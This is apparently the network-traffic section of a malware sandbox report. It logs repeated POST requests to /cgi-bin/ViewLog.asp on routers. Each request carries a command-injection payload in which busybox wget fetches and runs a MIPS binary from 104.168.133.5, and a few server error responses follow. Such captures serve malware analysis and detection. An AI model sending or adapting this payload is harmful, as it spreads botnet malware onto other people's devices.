                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              203192.168.2.144783895.86.96.568080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:58.956252098 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              204192.168.2.144724295.216.240.1468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:59.373852968 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              205192.168.2.145579694.187.97.688080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:59.391150951 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              206192.168.2.144121462.81.198.1368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:59.391823053 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:59.613957882 CET367INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              207192.168.2.144693694.120.14.1988080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:59.395689964 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              208192.168.2.144676694.187.113.1528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:59.829369068 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              209192.168.2.143303431.136.178.728080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:00.001405001 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:03.078567982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:09.222307920 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:21.253874063 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:46.340722084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:35.490665913 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              210192.168.2.145560431.136.181.1988080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:00.001471043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:03.078543901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:09.222343922 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:21.253876925 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:46.340733051 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:35.490642071 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              211192.168.2.145645862.235.50.1658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:00.008162975 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:00.205466986 CET552INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:16:00 GMT
                                              Server: Apache/2.4.56 (Debian)
                                              Content-Length: 304
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              212192.168.2.144486894.120.235.328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:00.041584969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              213192.168.2.144920062.232.170.828080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:02.822022915 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              214192.168.2.144820095.217.231.1658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:02.826616049 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:03.046224117 CET1340INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:16:02 GMT
                                              Server: Apache/2.4.56 (Debian)
                                              Referrer-Policy: no-referrer
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              X-Permitted-Cross-Domain-Policies: none
                                              X-Robots-Tag: noindex, nofollow
                                              X-XSS-Protection: 1; mode=block
                                              X-Powered-By: PHP/8.2.7
                                              Set-Cookie: ocnzsv36w8oq=bd48dc86abbb3d11e0d2cdf397338af8; path=/; secure; HttpOnly; SameSite=Lax
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
